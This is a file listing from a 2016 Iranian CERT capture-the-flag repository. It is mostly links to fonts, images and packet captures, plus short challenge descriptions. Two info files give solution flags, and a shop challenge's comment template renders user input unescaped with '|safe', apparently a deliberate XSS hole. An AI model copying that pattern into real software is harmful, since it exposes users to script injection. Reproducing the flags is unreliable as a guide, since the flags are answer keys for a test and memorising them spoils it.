https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-italic-webfont.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-light-webfont.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-lightitalic-webfont.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-medium-webfont.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-mediumitalic-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-regular-webfont.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thin-webfont.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.eot
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.woff
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-thinitalic-webfont.woff2
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-particles.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-particles.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-slideshow.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-slideshow.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-static.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/demo/demo-static.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/main-logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/main-logo.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/dandelion.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/dandelion.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/greens.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/greens.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/woods.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/images/slides/woods.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/info.txt:
--------------------------------------------------------------------------------
1 | Description:
2 | Brute captcha to get the flag.
3 |
4 |
5 | https://github.com/VulnHub/ctf-writeups/blob/master/2015/hackim/web-500.md
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/captcha.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/captcha.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/out.txt:
--------------------------------------------------------------------------------
1 | HELLE
2 |
3 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/output.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/output.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/output2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/PPC & Web/100pt- I hate captchas/solve/output2.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/README.md:
--------------------------------------------------------------------------------
1 | LSB Steganography
2 | =================
3 |
4 | A basic example of how to use LSB (Least Significant Bit) steganography on a BMP image
5 |
6 | http://en.wikipedia.org/wiki/Steganography#Example_from_modern_practice
7 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/Resources/README.md:
--------------------------------------------------------------------------------
1 | LSB Steganography
2 | =================
3 |
4 | A basic example of how to use LSB (Least Significant Bit) steganography on a BMP image
5 |
6 | http://en.wikipedia.org/wiki/Steganography#Example_from_modern_practice
7 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/Resources/lsb.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/Resources/lsb.bmp
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/Resources/lsb1.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/Resources/lsb1.bmp
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/info.txt:
--------------------------------------------------------------------------------
1 | Description:
2 | I always hated to be that last one, At least i should be in the second least place.
3 |
4 |
5 | Flag:
6 | APACTF{7H!5_0n3_was_4_little_TRICKY}
7 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/lsb.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/lsb.bmp
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/lsb1.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/lsb1.bmp
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/slsb/file.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- SLSB/slsb/file.bmp
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/flag.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/flag.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/for.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/for.pcapng
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/info.txt:
--------------------------------------------------------------------------------
1 | Flag:
2 | APACTF{C00l_!_Found_4N0TH3R_Fl4G}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/secret channel/secret.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Steg/80pt- secret channel/secret channel/secret.pcapng
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources.zip
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/local-admin-server/templates/comment.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | {{ comment|safe }}
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/.idea/.name:
--------------------------------------------------------------------------------
1 | project
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/.idea/scopes/scope_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/app/__init__.py:
--------------------------------------------------------------------------------
